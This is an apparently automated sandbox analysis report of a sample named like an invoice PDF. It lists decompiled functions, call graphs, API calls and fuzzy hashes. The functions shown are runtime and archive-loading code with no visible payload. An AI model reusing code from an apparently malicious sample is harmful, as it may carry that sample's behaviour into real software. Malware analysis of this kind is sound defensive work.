17489->17490 17491 13192d7 17489->17491 17490->17452 17493 13194cb 17491->17493 17494 1319370 try_get_function 5 API calls 17493->17494 17495 13194e5 17494->17495 17496 13194fc TlsFree 17495->17496 17497 13194f1 17495->17497 17496->17497 17497->17490 17501 13285bf 17498->17501 17502 13285bb 17498->17502 17499 131786a _ValidateLocalCookies 5 API calls 17500 1317e29 17499->17500 17500->17377 17500->17435 17501->17502 17504 132298e 17501->17504 17502->17499 17505 132299a ___scrt_is_nonwritable_in_current_image 17504->17505 17516 1325ffe EnterCriticalSection 17505->17516 17507 13229a1 17517 131e611 17507->17517 17509 13229b0 17515 13229bf 17509->17515 17530 1322822 GetStartupInfoW 17509->17530 17512 13229d0 ___scrt_is_nonwritable_in_current_image 17512->17501 17541 13229db 17515->17541 17516->17507 17518 131e61d ___scrt_is_nonwritable_in_current_image 17517->17518 17519 131e641 17518->17519 17520 131e62a 17518->17520 17544 1325ffe EnterCriticalSection 17519->17544 17522 131c9ce _free 20 API calls 17520->17522 17524 131e62f 17522->17524 17523 131e64d 17528 131e562 __wsopen_s 21 API calls 17523->17528 17529 131e679 17523->17529 17525 1321788 pre_c_initialization 26 API calls 17524->17525 17527 131e639 ___scrt_is_nonwritable_in_current_image 17525->17527 17527->17509 17528->17523 17545 131e6a0 17529->17545 17531 132283f 17530->17531 17533 13228d1 17530->17533 17532 131e611 27 API calls 17531->17532 17531->17533 17534 1322868 17532->17534 17536 13228d8 17533->17536 17534->17533 17535 1322896 GetFileType 17534->17535 17535->17534 17537 13228df 17536->17537 17538 1322922 GetStdHandle 17537->17538 17539 132298a 17537->17539 17540 1322935 GetFileType 17537->17540 17538->17537 17539->17515 17540->17537 17549 1326046 LeaveCriticalSection 17541->17549 17543 13229e2 17543->17512 17544->17523 17548 1326046 LeaveCriticalSection 17545->17548 17547 131e6a7 17547->17527 17548->17547 17549->17543 17551 13195f1 17550->17551 17552 13195cb 17550->17552 17551->17442 17552->17551 17553 13195db FreeLibrary 17552->17553 17553->17552 17555 1318537 17554->17555 17555->17389 17555->17555 17559 1314a24 17556->17559 17557 1314a2d 17557->17394 17558 1314a50 WideCharToMultiByte 17558->17559 17561 1314ac0 17558->17561 17559->17557 17559->17558 17559->17561 17562 1314a8b WideCharToMultiByte 17559->17562 17560 1311860 59 API calls 17563 1314ae2 17560->17563 17561->17560 17562->17559 17562->17561 17563->17394 17565 131245a __wsopen_s 17564->17565 17619 131d2be 17565->17619 17620 131d2c9 17619->17620 17774 1325806 17620->17774 17623 1311770 17775 1325818 17774->17775 17776 132582d 17774->17776 17777 131c9ce _free 20 API calls 17775->17777 17776->17775 17780 1325854 17776->17780 17778 132581d 17777->17778 17779 1321788 pre_c_initialization 26 API calls 17778->17779 17781 1312483 17779->17781 17783 1325711 17780->17783 17781->17623 17786 13256c0 17783->17786 17787 13256cc ___scrt_is_nonwritable_in_current_image 17786->17787 17794 131a847 EnterCriticalSection 17787->17794 17330 1317959 17335 131825f SetUnhandledExceptionFilter 17330->17335 17332 131795e pre_c_initialization 17336 132039d 17332->17336 17334 1317969 17335->17332 17337 13203c3 17336->17337 17338 13203a9 17336->17338 17337->17334 17338->17337 17339 131c9ce _free 20 API calls 17338->17339 17340 13203b3 17339->17340 17341 1321788 pre_c_initialization 26 API calls 17340->17341 17342 13203be 17341->17342 17342->17334 19497 13224dd 19498 13224ea 19497->19498 19502 1322502 19497->19502 19499 131c9ce _free 20 API calls 19498->19499 19500 13224ef 19499->19500 19501 1321788 pre_c_initialization 26 API calls 19500->19501 19511 13224fa 19501->19511 19503 132255d 19502->19503 19504 1328dc7 21 API calls 19502->19504 19502->19511 19505 13209c5 __fread_nolock 26 API calls 19503->19505 19504->19503 19506 1322575 19505->19506 19517 1322015 19506->19517 19508 132257c 19509 13209c5 __fread_nolock 26 API calls 19508->19509 19508->19511 19510 13225a8 19509->19510 19510->19511 19512 13209c5 __fread_nolock 26 API calls 19510->19512 19513 13225b6 19512->19513 19513->19511 19514 13209c5 __fread_nolock 26 API calls 19513->19514 19515 13225c6 19514->19515 19516 13209c5 __fread_nolock 26 API calls 19515->19516 19516->19511 19518 1322021 ___scrt_is_nonwritable_in_current_image 19517->19518 19519 1322029 19518->19519 19522 1322041 19518->19522 19520 131c9bb __dosmaperr 20 API calls 19519->19520 19523 132202e 19520->19523 19521 1322107 19524 131c9bb __dosmaperr 20 API calls 19521->19524 19522->19521 19526 132207a 19522->19526 19525 131c9ce _free 20 API calls 19523->19525 19527 132210c 19524->19527 19539 1322036 ___scrt_is_nonwritable_in_current_image 19525->19539 19529 1322089 19526->19529 19530 132209e 19526->19530 19528 131c9ce _free 20 API calls 19527->19528 19532 1322096 19528->19532 19533 131c9bb __dosmaperr 20 API calls 19529->19533 19547 131e6a9 EnterCriticalSection 19530->19547 19538 1321788 pre_c_initialization 26 API calls 19532->19538 19535 132208e 19533->19535 19534 13220a4 19536 13220c0 19534->19536 19537 13220d5 19534->19537 19540 131c9ce _free 20 API calls 19535->19540 19541 131c9ce _free 20 API calls 19536->19541 19542 1322128 __fread_nolock 38 API calls 19537->19542 19538->19539 19539->19508 19540->19532 19543 13220c5 19541->19543 19544 13220d0 19542->19544 19545 131c9bb __dosmaperr 20 API calls 19543->19545 19548 13220ff 19544->19548 19545->19544 19547->19534 19551 131e760 LeaveCriticalSection 19548->19551 19550 1322105 19550->19539 19551->19550

                            Executed Functions

                            Function 0131825F, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0131825F() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0131826B); // executed
				return _t1;
			}




                            0x01318264
                            0x0131826a

                            APIs
                            • SetUnhandledExceptionFilter.KERNELBASE(Function_0000826B,0131795E), ref: 01318264
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 8e6688297ab1819537b33f4752e2de60c751f08a361de62236530b887702b286
                            • Instruction ID: 070c1da1d6614b30086f5729c3996331334f4cd3c6b2161a74c5a1a15b60fd56
                            • Opcode Fuzzy Hash: 8e6688297ab1819537b33f4752e2de60c751f08a361de62236530b887702b286
                            • Instruction Fuzzy Hash:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01311560, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 95COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E01311560(void* __ecx, void* __edx, void* __ebp, signed int* _a4) {
				void* _t14;
				signed int _t15;
				void* _t18;
				signed int _t19;
				void* _t20;
				signed int _t26;
				signed int _t28;
				void* _t31;
				void* _t32;
				signed int* _t33;
				void* _t35;
				void* _t36;

				_t32 = __edx;
				_t31 = __ecx;
				_t33 = _a4;
				if( *_t33 != 0) {
					L2:
					_t14 = E01311120(_t32, _t33);
					_t36 = _t35 + 4;
					_t48 = _t14 - 1;
					if(_t14 < 1) {
						E01319F16(_t32,  *_t33, 0, 2); // executed
						_t14 = E0131A488(_t32, _t48,  *_t33); // executed
						_t36 = _t36 + 0x10;
					}
					_t15 = E013113D0(_t32, _t33, _t14);
					if(_t15 == 0xffffffff) {
						goto L7;
					} else {
						_t3 =  &(_t33[9]); // 0x1
						_push( *_t3);
						_t33[0x101b] = 0;
						L01317864();
						_push(0);
						 *0x133c954 = _t15;
						_t5 =  &(_t33[7]); // 0xc0335f00
						L01317864();
						_t6 =  &(_t33[1]); // 0x1a74c085
						_t18 = E01319F16(_t32,  *_t33, _t15 +  *_t6,  *_t5); // executed
						_t7 =  &(_t33[8]); // 0xb85fc35b
						_push( *_t7);
						L01317864();
						_push(_t18); // executed
						_t19 = E01319808(_t31); // executed
						_t33[2] = _t19;
						_t50 = _t19;
						if(_t19 != 0) {
							_push( *_t33);
							_t9 =  &(_t33[8]); // 0xb85fc35b
							L01317864();
							_t10 =  &(_t33[2]); // 0xc085078b, executed
							_t20 = E01319B2B( *_t10, _t19,  *_t9, 1); // executed
							__eflags = _t20 - 1;
							if(__eflags >= 0) {
								_t11 =  &(_t33[8]); // 0xb85fc35b
								_push( *_t11);
								L01317864();
								_t12 =  &(_t33[2]); // 0xc085078b
								_t33[3] = _t20 +  *_t12;
								__eflags = E01319934( *_t33);
								if(__eflags == 0) {
									E01311200(_t33);
									__eflags = 0;
									return 0;
								} else {
									_push("Error on file\n.");
									_t26 = E01311910(__eflags) | 0xffffffff;
									__eflags = _t26;
									return _t26;
								}
							} else {
								_push("Could not read from file.");
								_push("fread");
								_t28 = E013117B0(__eflags) | 0xffffffff;
								__eflags = _t28;
								return _t28;
							}
						} else {
							_push("Could not allocate buffer for TOC.");
							_push("malloc");
							_t15 = E013117B0(_t50);
							goto L7;
						}
					}
				} else {
					_t2 =  &(_t33[0x1a]); // 0x131176c
					_t15 = E013128C0(_t2, "rb");
					_t35 = _t35 + 8;
					 *_t33 = _t15;
					if(_t15 == 0) {
						L7:
						return _t15 | 0xffffffff;
					} else {
						goto L2;
					}
				}
			}















                            0x01311560
                            0x01311560
                            0x01311561
                            0x01311568
                            0x01311585
                            0x01311586
                            0x0131158b
                            0x0131158e
                            0x01311591
                            0x01311599
                            0x013115a0
                            0x013115a5
                            0x013115a5
                            0x013115aa
                            0x013115b5
                            0x00000000
                            0x013115b7
                            0x013115b7
                            0x013115b7
                            0x013115ba
                            0x013115c4
                            0x013115c9
                            0x013115cb
                            0x013115d0
                            0x013115d3
                            0x013115d8
                            0x013115de
                            0x013115e6
                            0x013115e6
                            0x013115e9
                            0x013115ee
                            0x013115ef
                            0x013115f7
                            0x013115fa
                            0x013115fc
                            0x01311615
                            0x01311619
                            0x0131161c
                            0x01311622
                            0x01311625
                            0x0131162d
                            0x01311630
                            0x01311649
                            0x01311649
                            0x0131164c
                            0x01311651
                            0x01311656
                            0x01311661
                            0x01311663
                            0x01311678
                            0x01311680
                            0x01311683
                            0x01311665
                            0x01311665
                            0x01311672
                            0x01311672
                            0x01311676
                            0x01311676
                            0x01311632
                            0x01311632
                            0x01311637
                            0x01311644
                            0x01311644
                            0x01311648
                            0x01311648
                            0x013115fe
                            0x013115fe
                            0x01311603
                            0x01311608
                            0x00000000
                            0x0131160d
                            0x013115fc
                            0x0131156a
                            0x0131156a
                            0x01311573
                            0x01311578
                            0x0131157b
                            0x0131157f
                            0x01311610
                            0x01311614
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131157f

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Could not allocate buffer for TOC.$Could not read from file.$Error on file.$fread$malloc
                            • API String ID: 3757756281-2332847760
                            • Opcode ID: b1e6da5404811f60937ae96a0ca691df1826db12bfc6411a4a220534ffcd1095
                            • Instruction ID: fd9acf414977476da447cc55108fdcd8394025dc1c065c84879d1fbc300c5adf
                            • Opcode Fuzzy Hash: b1e6da5404811f60937ae96a0ca691df1826db12bfc6411a4a220534ffcd1095
                            • Instruction Fuzzy Hash: 4B21FDB1840702B7DA293B3DEC01B9B7AD5AF2026DF080D28F9D9913A9F763D5508A55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01322128, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 39 1322128-1322138 40 1322152-1322154 39->40 41 132213a-132214d call 131c9bb call 131c9ce 39->41 42 132215a-1322160 40->42 43 13224bc-13224c9 call 131c9bb call 131c9ce 40->43 55 13224d4 41->55 42->43 45 1322166-1322191 42->45 60 13224cf call 1321788 43->60 45->43 48 1322197-13221a0 45->48 52 13221a2-13221b5 call 131c9bb call 131c9ce 48->52 53 13221ba-13221bc 48->53 52->60 58 13221c2-13221c6 53->58 59 13224b8-13224ba 53->59 61 13224d7-13224dc 55->61 58->59 63 13221cc-13221d0 58->63 59->61 60->55 63->52 66 13221d2-13221e9 63->66 68 1322206-132220f 66->68 69 13221eb-13221ee 66->69 70 1322211-1322228 call 131c9bb call 131c9ce call 1321788 68->70 71 132222d-1322237 68->71 72 13221f0-13221f6 69->72 73 13221f8-1322201 69->73 103 13223ef 70->103 76 1322239-132223b 71->76 77 132223e-132225c call 1320a25 call 13209eb * 2 71->77 72->70 72->73 74 13222a2-13222bc 73->74 79 13222c2-13222d2 74->79 80 1322390-1322399 call 1328d71 74->80 76->77 107 1322279-132229f call 1322807 77->107 108 132225e-1322274 call 131c9ce call 131c9bb 77->108 79->80 84 13222d8-13222da 79->84 91 132239b-13223ad 80->91 92 132240c 80->92 84->80 88 13222e0-1322306 84->88 88->80 93 132230c-132231f 88->93 91->92 97 13223af-13223be GetConsoleMode 91->97 95 1322410-1322428 ReadFile 92->95 93->80 98 1322321-1322323 93->98 101 1322484-132248f GetLastError 95->101 102 132242a-1322430 95->102 97->92 104 13223c0-13223c4 97->104 98->80 105 1322325-1322350 98->105 109 1322491-13224a3 call 131c9ce call 131c9bb 101->109 110 13224a8-13224ab 101->110 102->101 111 1322432 102->111 113 13223f2-13223fc call 13209eb 103->113 104->95 112 13223c6-13223e0 ReadConsoleW 104->112 105->80 106 1322352-1322365 105->106 106->80 115 1322367-1322369 106->115 107->74 108->103 109->103 122 13224b1-13224b3 110->122 123 13223e8-13223ee call 131c998 110->123 119 1322435-1322447 111->119 120 13223e2 GetLastError 112->120 121 1322401-132240a 112->121 113->61 115->80 125 132236b-132238b 115->125 119->113 129 1322449-132244d 119->129 120->123 121->119 122->113 123->103 125->80 133 1322466-1322471 129->133 134 132244f-132245f call 1321e42 129->134 139 1322473 call 1321f94 133->139 140 132247d-1322482 call 1321c82 133->140 146 1322462-1322464 134->146 144 1322478-132247b 139->144 140->144 144->146 146->113
                            C-Code - Quality: 77%
                            			E01322128(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E0131C9BB();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E0131C9CE())) = 9;
						L59:
						_t145 = E01321788();
						goto L60;
					}
					__eflags = _t213 -  *0x1346308; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x1346108 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E01320A25(_t224, _t158);
								E013209EB(0);
								E013209EB(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E01322807(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x1346108 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x1346108 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E01328D71(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0); // executed
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E0131C998(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E0131C9CE())) = 9;
											 *(E0131C9BB()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x1346108 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E01321C82();
												} else {
													_t176 = E01321F94();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E01321E42(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t104 =  &_v28; // 0xa
									_t231 =  *_t104;
									_t178 =  *((intOrPtr*)(0x1346108 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E0131C9CE())) = 0xc;
									 *(E0131C9BB()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E013209EB(_t246);
									return _t242;
								}
							}
							L15:
							 *(E0131C9BB()) =  *_t206 & _t246;
							 *((intOrPtr*)(E0131C9CE())) = 0x16;
							E01321788();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E0131C9BB()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E0131C9CE())) = 0x16;
					goto L59;
				} else {
					 *(E0131C9BB()) =  *_t212 & 0x00000000;
					_t145 = E0131C9CE();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                            0x01322131
                            0x01322138
                            0x01322152
                            0x01322154
                            0x013224bc
                            0x013224bc
                            0x013224c1
                            0x013224c1
                            0x013224c9
                            0x013224cf
                            0x013224cf
                            0x00000000
                            0x013224cf
                            0x0132215a
                            0x01322160
                            0x00000000
                            0x00000000
                            0x01322168
                            0x01322174
                            0x01322177
                            0x0132217a
                            0x0132217d
                            0x01322184
                            0x01322187
                            0x0132218b
                            0x0132218e
                            0x01322191
                            0x00000000
                            0x00000000
                            0x01322197
                            0x0132219a
                            0x013221a0
                            0x013221ba
                            0x013221bc
                            0x013224b8
                            0x00000000
                            0x013224b8
                            0x013221c2
                            0x013221c6
                            0x00000000
                            0x00000000
                            0x013221cc
                            0x013221d0
                            0x00000000
                            0x00000000
                            0x013221d7
                            0x013221db
                            0x013221de
                            0x013221e1
                            0x013221e6
                            0x013221e6
                            0x013221e9
                            0x01322206
                            0x0132220b
                            0x0132220d
                            0x0132220f
                            0x0132222f
                            0x01322230
                            0x01322232
                            0x01322235
                            0x01322237
                            0x01322239
                            0x0132223b
                            0x0132223b
                            0x01322246
                            0x01322248
                            0x0132224f
                            0x01322254
                            0x01322257
                            0x0132225a
                            0x0132225c
                            0x01322281
                            0x01322286
                            0x0132228d
                            0x01322290
                            0x01322293
                            0x01322297
                            0x01322299
                            0x0132229d
                            0x0132229f
                            0x013222a2
                            0x013222a5
                            0x013222a7
                            0x013222aa
                            0x013222b1
                            0x013222b4
                            0x013222b9
                            0x013222bc
                            0x013222c5
                            0x013222c9
                            0x013222cc
                            0x013222cf
                            0x013222d2
                            0x013222d8
                            0x013222da
                            0x013222e3
                            0x013222e6
                            0x013222e9
                            0x013222ec
                            0x013222ed
                            0x013222f1
                            0x013222f7
                            0x01322301
                            0x01322306
                            0x01322316
                            0x0132231a
                            0x0132231d
                            0x0132231f
                            0x01322321
                            0x01322323
                            0x01322325
                            0x0132232d
                            0x0132232e
                            0x01322331
                            0x01322334
                            0x01322335
                            0x0132233b
                            0x01322345
                            0x0132234d
                            0x01322350
                            0x0132235c
                            0x01322360
                            0x01322363
                            0x01322365
                            0x01322367
                            0x01322369
                            0x0132236b
                            0x01322373
                            0x01322374
                            0x01322377
                            0x0132237a
                            0x0132237a
                            0x0132237b
                            0x01322381
                            0x0132238b
                            0x0132238b
                            0x01322369
                            0x01322365
                            0x01322350
                            0x01322323
                            0x0132231f
                            0x01322306
                            0x013222da
                            0x013222d2
                            0x01322391
                            0x01322397
                            0x01322399
                            0x0132240c
                            0x0132240c
                            0x01322410
                            0x01322420
                            0x01322426
                            0x01322428
                            0x01322484
                            0x01322484
                            0x0132248c
                            0x0132248d
                            0x0132248f
                            0x013224a8
                            0x013224ab
                            0x013223e8
                            0x013223e9
                            0x00000000
                            0x013223ee
                            0x013224b1
                            0x00000000
                            0x013224b1
                            0x01322496
                            0x013224a1
                            0x00000000
                            0x013224a1
                            0x0132242a
                            0x0132242d
                            0x01322430
                            0x00000000
                            0x00000000
                            0x01322432
                            0x01322432
                            0x01322435
                            0x01322438
                            0x0132243b
                            0x01322442
                            0x01322447
                            0x01322449
                            0x0132244d
                            0x01322468
                            0x0132246c
                            0x0132246d
                            0x01322470
                            0x01322471
                            0x0132247d
                            0x01322473
                            0x01322473
                            0x01322473
                            0x0132244f
                            0x0132244f
                            0x0132244f
                            0x0132245a
                            0x0132245f
                            0x01322462
                            0x01322462
                            0x00000000
                            0x01322447
                            0x0132239e
                            0x0132239e
                            0x013223a1
                            0x013223a8
                            0x013223ad
                            0x00000000
                            0x00000000
                            0x013223b6
                            0x013223bc
                            0x013223be
                            0x00000000
                            0x00000000
                            0x013223c0
                            0x013223c4
                            0x00000000
                            0x00000000
                            0x013223d8
                            0x013223de
                            0x013223e0
                            0x01322404
                            0x01322407
                            0x00000000
                            0x01322407
                            0x013223e2
                            0x00000000
                            0x0132225e
                            0x01322263
                            0x0132226e
                            0x013223ef
                            0x013223ef
                            0x013223ef
                            0x013223f2
                            0x013223f3
                            0x00000000
                            0x013223fb
                            0x0132225c
                            0x01322211
                            0x01322216
                            0x0132221d
                            0x01322223
                            0x00000000
                            0x01322223
                            0x013221eb
                            0x013221ee
                            0x013221f8
                            0x013221f8
                            0x013221fb
                            0x013221fe
                            0x00000000
                            0x013221fe
                            0x013221f2
                            0x013221f4
                            0x013221f6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013221f6
                            0x013221a2
                            0x013221a7
                            0x013221af
                            0x00000000
                            0x0132213a
                            0x0132213f
                            0x01322142
                            0x01322147
                            0x013224d4
                            0x00000000
                            0x013224d4

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3907804496
                            • Opcode ID: 2f2b25abc29c9321f4b1ced9773de6062cb31f221b2110c8870f0fe023680d45
                            • Instruction ID: f737d7feebc91e03a62f3857952f2b1c5323acdf44f7e709eedeafb4a9c49f8a
                            • Opcode Fuzzy Hash: 2f2b25abc29c9321f4b1ced9773de6062cb31f221b2110c8870f0fe023680d45
                            • Instruction Fuzzy Hash: 0FC1D474D0426AAFDF15EFADDC40BAEBBB4AF1A308F044185EA51A7382C7749941CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132BD1F, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                            Download Yara Rule

